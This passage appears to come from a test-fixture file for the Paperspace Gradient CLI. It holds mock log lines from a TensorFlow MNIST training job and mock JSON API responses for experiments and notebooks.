"2019-07-08T12:41:22.289Z", "message": "I0708 12:41:22.288971 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.12382953, learning_rate = 1e-04, train_accuracy = 0.868 (1.032 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 123, "timestamp": "2019-07-08T12:41:22.289Z", "message": "I0708 12:41:22.289424 140451862599424 basic_session_run_hooks.py:247] loss = 0.12382953, step = 900 (1.032 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 124, "timestamp": "2019-07-08T12:41:23.297Z", "message": "I0708 12:41:23.297554 140451862599424 basic_session_run_hooks.py:594] Saving checkpoints for 1000 into /paperspace/models/mnist/model.ckpt." }, { "jobId": "jsy2ibsz1l026y", "line": 125, "timestamp": "2019-07-08T12:41:23.399Z", "message": "I0708 12:41:23.398564 140451862599424 training.py:525] Skip the current checkpoint eval due to throttle secs (10 secs)." }, { "jobId": "jsy2ibsz1l026y", "line": 126, "timestamp": "2019-07-08T12:41:23.451Z", "message": "I0708 12:41:23.450761 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 127, "timestamp": "2019-07-08T12:41:23.655Z", "message": "I0708 12:41:23.655447 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 128, "timestamp": "2019-07-08T12:41:23.681Z", "message": "I0708 12:41:23.681046 140451862599424 evaluation.py:257] Starting evaluation at 2019-07-08T12:41:23Z" }, { "jobId": "jsy2ibsz1l026y", "line": 129, "timestamp": "2019-07-08T12:41:23.872Z", "message": "I0708 12:41:23.871646 140451862599424 monitored_session.py:222] Graph was finalized." }, { "jobId": "jsy2ibsz1l026y", "line": 130, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872269: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 131, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872324: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 132, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872338: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 133, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872353: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 134, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872548: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 135, "timestamp": "2019-07-08T12:41:23.874Z", "message": "I0708 12:41:23.874099 140451862599424 saver.py:1270] Restoring parameters from /paperspace/models/mnist/model.ckpt-1000" }, { "jobId": "jsy2ibsz1l026y", "line": 136, "timestamp": "2019-07-08T12:41:23.932Z", "message": "I0708 12:41:23.932351 140451862599424 session_manager.py:491] Running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 137, "timestamp": "2019-07-08T12:41:23.946Z", "message": "I0708 12:41:23.946145 140451862599424 session_manager.py:493] Done running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 138, "timestamp": "2019-07-08T12:41:25.49Z", "message": "I0708 12:41:25.490408 140451862599424 evaluation.py:277] Finished evaluation at 2019-07-08-12:41:25" }, { "jobId": "jsy2ibsz1l026y", "line": 139, "timestamp": "2019-07-08T12:41:25.491Z", "message": "I0708 12:41:25.490850 140451862599424 estimator.py:1979] Saving dict for global step 1000: accuracy = 0.9787, global_step = 1000, loss = 0.0693267" }, { "jobId": "jsy2ibsz1l026y", "line": 140, "timestamp": "2019-07-08T12:41:25.491Z", "message": "I0708 12:41:25.491545 140451862599424 estimator.py:2039] Saving 'checkpoint_path' summary for global step 1000: /paperspace/models/mnist/model.ckpt-1000" }, { "jobId": "jsy2ibsz1l026y", "line": 141, "timestamp": "2019-07-08T12:41:25.492Z", "message": "I0708 12:41:25.492296 140451862599424 training.py:928] Calling exporter with the `is_the_final_export=True`." }, { "jobId": "jsy2ibsz1l026y", "line": 142, "timestamp": "2019-07-08T12:41:25.492Z", "message": "I0708 12:41:25.492531 140451862599424 util.py:168] Finalize strategy." }, { "jobId": "jsy2ibsz1l026y", "line": 143, "timestamp": "2019-07-08T12:41:25.572Z", "message": "I0708 12:41:25.571871 140451862599424 estimator.py:359] Loss for final step: 0.03955281." }, { "jobId": "jsy2ibsz1l026y", "line": 144, "timestamp": "2019-07-08T12:41:25.572Z", "message": "I0708 12:41:25.572580 140451862599424 mnist.py:240] Starting to Export model to /paperspace/models" }, { "jobId": "jsy2ibsz1l026y", "line": 145, "timestamp": "2019-07-08T12:41:25.583Z", "message": "I0708 12:41:25.583298 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 146, "timestamp": "2019-07-08T12:41:25.744Z", "message": "I0708 12:41:25.744162 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 147, "timestamp": "2019-07-08T12:41:25.744Z", "message": "W0708 12:41:25.744491 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/saved_model/signature_def_utils_impl.py:205: build_tensor_info (from tensorflow.python.saved_model.utils_impl) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 148, "timestamp": "2019-07-08T12:41:25.744Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 149, "timestamp": "2019-07-08T12:41:25.744Z", "message": "This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.utils.build_tensor_info or tf.compat.v1.saved_model.build_tensor_info." }, { "jobId": "jsy2ibsz1l026y", "line": 150, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745018 140451862599424 export.py:587] Signatures INCLUDED in export for Regress: None" }, { "jobId": "jsy2ibsz1l026y", "line": 151, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745139 140451862599424 export.py:587] Signatures INCLUDED in export for Train: None" }, { "jobId": "jsy2ibsz1l026y", "line": 152, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745274 140451862599424 export.py:587] Signatures INCLUDED in export for Predict: ['serving_default', 'classify']" }, { "jobId": "jsy2ibsz1l026y", "line": 153, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745424 140451862599424 export.py:587] Signatures INCLUDED in export for Classify: None" }, { "jobId": "jsy2ibsz1l026y", "line": 154, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745549 140451862599424 export.py:587] Signatures INCLUDED in export for Eval: None" }, { "jobId": "jsy2ibsz1l026y", "line": 155, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746041: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 156, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746099: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 157, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746110: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 158, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746126: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 159, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746278: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 160, "timestamp": "2019-07-08T12:41:25.779Z", "message": "I0708 12:41:25.778900 140451862599424 saver.py:1270] Restoring parameters from /paperspace/models/mnist/model.ckpt-1000" }, { "jobId": "jsy2ibsz1l026y", "line": 161, "timestamp": "2019-07-08T12:41:25.814Z", "message": "I0708 12:41:25.814109 140451862599424 builder_impl.py:654] Assets added to graph." }, { "jobId": "jsy2ibsz1l026y", "line": 162, "timestamp": "2019-07-08T12:41:25.814Z", "message": "I0708 12:41:25.814344 140451862599424 builder_impl.py:449] No assets to write." }, { "jobId": "jsy2ibsz1l026y", "line": 163, "timestamp": "2019-07-08T12:41:25.878Z", "message": "I0708 12:41:25.877661 140451862599424 builder_impl.py:414] SavedModel written to: /paperspace/models/temp-b'1562589685'/saved_model.pb" }, { "jobId": "jsy2ibsz1l026y", "line": 164, "timestamp": "2019-07-08T12:41:25.878Z", "message": "I0708 12:41:25.878680 140451862599424 mnist.py:247] Model Exported" }, { "jobId": "jsy2ibsz1l026y", "line": 165, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Gradient SDK not installed. Distributed training is not possible" }, { "jobId": "jsy2ibsz1l026y", "line": 166, "timestamp": "2019-07-08T12:41:25.879Z", "message": "" }, { "jobId": "jsy2ibsz1l026y", "line": 167, "timestamp": "2019-07-08T12:41:25.879Z", "message": "WARNING: The TensorFlow contrib module will not be included in TensorFlow 2.0." }, { "jobId": "jsy2ibsz1l026y", "line": 168, "timestamp": "2019-07-08T12:41:25.879Z", "message": "For more information, please see:" }, { "jobId": "jsy2ibsz1l026y", "line": 169, "timestamp": "2019-07-08T12:41:25.879Z", "message": " * https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md" }, { "jobId": "jsy2ibsz1l026y", "line": 170, "timestamp": "2019-07-08T12:41:25.879Z", "message": " * https://github.com/tensorflow/addons" }, { "jobId": "jsy2ibsz1l026y", "line": 171, "timestamp": "2019-07-08T12:41:25.879Z", "message": "If you depend on functionality not listed there, please file an issue." }, { "jobId": "jsy2ibsz1l026y", "line": 172, "timestamp": "2019-07-08T12:41:25.879Z", "message": "" }, { "jobId": "jsy2ibsz1l026y", "line": 173, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/train-images-idx3-ubyte.gz to /tmp/tmp5a21acuc.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 174, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/train-labels-idx1-ubyte.gz to /tmp/tmpl6cdsahk.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 175, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/t10k-images-idx3-ubyte.gz to /tmp/tmplh4ob02m.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 176, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/t10k-labels-idx1-ubyte.gz to /tmp/tmpbrss4txl.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 177, "timestamp": "2019-07-08T12:41:36.525Z", "message": "PSEOF" } ] DETAILS_OF_SINGLE_NODE_EXPERIMENT_RESPONSE_JSON = { "data": { "dtCreated": "2020-04-02T21:37:00.000000+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-22T13:22:27.200591+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 21814, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "esro6mbmiulvbl", "id": 21784, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1655, "state": 1, "tags": [ { "name": "tag1", }, { "name": "tag2", }, ], "templateHistory": { "dtCreated": "2019-03-22T13:22:26.375543+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 21814, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2" }, "triggerEvent": None, "triggerEventId": None }, "datasets": [ { "uri": "s3://some/dataset", "volume_options": { "kind": "dynamic", "size": "10Gi", }, }, ], }, "message": "success" } DETAILS_OF_MULTI_NODE_EXPERIMENT_RESPONSE_JSON = { "data": { "dtCreated": "2019-12-16T16:18:47.881765+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-12-16T16:18:47.881765+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 34335, "experimentTemplateId": 439, "experimentTypeId": 3, "handle": "emarbao6t6tsn", "id": 34272, "projectHandle": "pr85u3sfa", "projectId": 1824, "started_by_user_id": 1655, "state": 10, "tags": [ { "name": "tag1", }, { "name": "tag2", }, ], "templateHistory": { "cliCommand": "gradient experiments create multinode --name some_name --projectId pr85u3sfa --experimentType MPI --workerContainer python --workerMachineType c5.xlarge --workerCommand \"echo worker\" --workerCount 2 --masterContainer python --masterMachineType c5.xlarge --masterCommand \"echo master\" --masterCount 1 --workspaceUrl some.url --workingDirectory /some/working/directory --clusterId clqr4b0ox --experimentEnv '{\"key\": \"value\"}' --ports 5000 --modelType some_type --modelPath /some/model/path", "dtCreated": "2019-12-16T16:18:46.577973+00:00", "dtDeleted": None, "experimentTemplateId": 439, "id": 34335, "params": { "artifact_directory": "/some/artifact/directory", "cluster_id": "clqr4b0ox", "experiment_env": { "key": "value" }, "is_preemptible": False, "model_path": "/some/model/path", "model_type": "some_type", "name": "some_name", "ports": "5000", "project_handle": "pr85u3sfa", "version": "v2", "working_directory": "/some/working/directory", "workspace_url": "some.url" }, "triggerEvent": None, "triggerEventId": None } }, "message": "success" } NOTEBOOK_GET_RESPONSE = { "name": "some_name", "handle": "ngw7piq9", "jobHandle": "jzhmk7fpluqje", "project": "Notebook-some_name", "projectHandle": "prg284tu2", "state": "Running", "token": "dc2c331ce694ebe5a615f6e5885f6a933fcb1be49cb0d17f", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ngw7piq9.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "some_namespace", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-03T11:06:18.154Z", "dtModified": "2019-09-03T11:06:18.154Z", "dtProvisioningStarted": "2019-09-03T11:08:36.286Z", "dtProvisioningFinished": "2019-09-03T11:10:36.471Z", "dtStarted": "2019-09-03T11:10:36.471Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20206, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567508793", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617088427", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1823, "metricsURL": "aws-testing.paperspace.io", } NOTEBOOK_GET_RESPONSE_WITH_TAGS = { "name": "some_name", "handle": "ngw7piq9", "jobHandle": "jzhmk7fpluqje", "project": "Notebook-some_name", "projectHandle": "prg284tu2", "state": "Running", "token": "dc2c331ce694ebe5a615f6e5885f6a933fcb1be49cb0d17f", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ngw7piq9.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "some_namespace", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-03T11:06:18.154Z", "dtModified": "2019-09-03T11:06:18.154Z", "dtProvisioningStarted": "2019-09-03T11:08:36.286Z", "dtProvisioningFinished": "2019-09-03T11:10:36.471Z", "dtStarted": "2019-09-03T11:10:36.471Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20206, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567508793", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617088427", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1823, "tags": [ "tag1", "tag2" ], } NOTEBOOKS_LIST_RESPONSE_JSON = { "notebookList": [ { "name": "job 1", "handle": "n1vmfj6x", "jobHandle": "jsh0692p80dphg", "project": "Notebook-undefined", "projectHandle": "pr231zktg", "state": "Running", "token": "80426c989ef8d42b4dff6806c9592b1111a47c63c0f4a36f", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "n1vmfj6x.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T11:06:12.667Z", "dtModified": "2019-09-04T11:06:12.667Z", "dtProvisioningStarted": "2019-09-04T11:08:28.305Z", "dtProvisioningFinished": "2019-09-04T11:10:30.628Z", "dtStarted": "2019-09-04T11:10:30.628Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": None, "jobId": 20221, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567595186", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617028675", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1832 }, { "name": "job 1", "handle": "nhdf8zf3", "jobHandle": "jsyvcxoxch3jgu", "project": "Notebook-undefined", "projectHandle": "pr2u2sfja", "state": "Running", "token": "1d763ce770a195c98ea3d30588f3ad007c2b8403608ab091", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nhdf8zf3.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T10:23:04.762Z", "dtModified": "2019-09-04T10:23:04.762Z", "dtProvisioningStarted": "2019-09-04T10:26:05.190Z", "dtProvisioningFinished": "2019-09-04T10:28:13.609Z", "dtStarted": "2019-09-04T10:28:13.609Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": None, "jobId": 20219, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567592650-d5337953", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297204 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617086962", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1831 }, { "name": "My Notebook 123", "handle": "nslk5r03", "jobHandle": "jskm7amsly7mmj", "project": "Notebook-My Notebook 123", "projectHandle": "pr3qq8qlg", "state": "Stopped", "token": "7751a516535bf3d52c164315d6187c1c9a04f15c15cf1c15", "container": "nslk5r03", "containerUrl": "us.gcr.io/ps-development-229517/paperspace/pr3qq8qlg:nslk5r03", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nslk5r03.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T10:22:43.248Z", "dtModified": "2019-09-04T10:22:43.248Z", "dtProvisioningStarted": "2019-09-04T10:25:26.545Z", "dtProvisioningFinished": "2019-09-04T10:27:24.319Z", "dtStarted": "2019-09-04T10:27:24.319Z", "dtFinished": "2019-09-04T16:27:52.044Z", "dtTeardownStarted": "2019-09-04T16:27:56.915Z", "dtTeardownFinished": "2019-09-04T16:28:57.796Z", "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20218, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567592577", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617029024", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1830 }, { "name": "My Notebook 123", "handle": "ng9a3tp4", "jobHandle": "jg5vkj6d799z8", "project": "Notebook-My Notebook 123", "projectHandle": "pr5ngrxr9", "state": "Stopped", "token": "d9ba60e2bf7abd8ebd0c9988507ce203dd9baa7bc2b77284", "container": "ng9a3tp4", "containerUrl": "us.gcr.io/ps-development-229517/paperspace/pr5ngrxr9:ng9a3tp4", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ng9a3tp4.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T10:16:22.362Z", "dtModified": "2019-09-04T10:16:22.362Z", "dtProvisioningStarted": "2019-09-04T10:18:46.309Z", "dtProvisioningFinished": "2019-09-04T10:20:45.879Z", "dtStarted": "2019-09-04T10:20:45.879Z", "dtFinished": "2019-09-04T16:20:51.718Z", "dtTeardownStarted": "2019-09-04T16:20:56.745Z", "dtTeardownFinished": "2019-09-04T16:22:03.922Z", "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20217, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567592197", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617086541", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1829 }, { "name": "some_name", "handle": "ngw7piq9", "jobHandle": "jzhmk7fpluqje", "project": "Notebook-some_name", "projectHandle": "prg284tu2", "state": "Stopped", "token": "dc2c331ce694ebe5a615f6e5885f6a933fcb1be49cb0d17f", "container": "ngw7piq9", "containerUrl": "us.gcr.io/ps-development-229517/paperspace/prg284tu2:ngw7piq9", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ngw7piq9.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-03T11:06:18.154Z", "dtModified": "2019-09-03T11:06:18.154Z", "dtProvisioningStarted": "2019-09-03T11:08:36.286Z", "dtProvisioningFinished": "2019-09-03T11:10:36.471Z", "dtStarted": "2019-09-03T11:10:36.471Z", "dtFinished": "2019-09-03T17:10:53.440Z", "dtTeardownStarted": "2019-09-03T17:10:54.455Z", "dtTeardownFinished": "2019-09-03T17:12:01.889Z", "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20206, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567508793", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl 